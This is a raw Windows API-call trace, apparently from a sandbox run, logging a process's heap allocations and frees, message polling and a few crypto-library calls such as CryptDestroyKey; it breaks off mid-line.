[0161.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0161.279] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0161.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0161.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0161.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0161.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0161.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0161.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0161.279] CryptDestroyKey (hKey=0xa87590) returned 1 [0161.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0161.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0161.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0161.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0161.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0161.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0161.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0161.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0161.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0161.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0161.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0161.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0161.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0161.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0161.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0161.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0161.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0161.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0161.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0161.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0161.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0161.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0161.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0161.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0161.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0161.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0161.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0161.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0161.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0161.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0161.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0161.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0161.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0161.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0161.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0161.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0161.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0161.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0161.281] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0161.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0161.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0161.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0161.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0161.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0161.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0161.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0161.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0161.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0161.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0161.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0161.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0161.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0161.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0161.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0161.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0161.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0161.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0161.282] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0161.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0161.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0161.282] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0161.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0161.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0161.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0161.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0161.282] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0161.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0161.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0161.282] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0161.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0161.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0161.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0161.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0161.283] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0161.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0161.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0161.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0161.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0161.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0161.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0161.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0161.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0161.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0161.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0161.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0161.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0161.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0161.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0161.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0161.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0161.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0161.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0161.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0161.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0161.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0161.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0161.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0161.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0161.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0161.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0161.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0161.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0161.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0161.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0161.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0161.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0161.284] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0161.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0161.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0161.284] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0161.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0161.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0161.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0161.284] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0161.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0161.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0161.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0161.286] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0161.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0161.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0161.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0161.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0161.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0161.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0161.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0161.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0161.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0161.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0161.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0161.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0161.288] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0161.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0161.288] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0161.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0161.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0161.288] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0161.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0161.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0161.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0161.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0161.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0161.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0161.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0161.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0161.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0161.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0161.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0161.288] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0161.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0161.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0161.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0161.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0161.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0161.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0161.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0161.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0161.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0161.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0161.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0161.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0161.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0161.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0161.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0161.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0161.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0161.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0161.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0161.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0161.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0161.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0161.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0161.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0161.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0161.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0161.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0161.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0161.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0161.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0161.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0161.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0161.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0161.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0161.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0161.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0161.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0161.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0161.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0161.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0161.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0161.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0161.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0161.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0161.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0161.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0161.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0161.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0161.291] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0161.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0161.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0161.291] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0161.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0161.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0161.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0161.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0161.291] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0161.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0161.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0161.291] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0161.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0161.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0161.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0161.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0161.291] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0161.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0161.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0161.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0161.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0161.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0161.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0161.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0161.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0161.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0161.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0161.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0161.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0161.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0161.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0161.292] RtlAllocateHeap 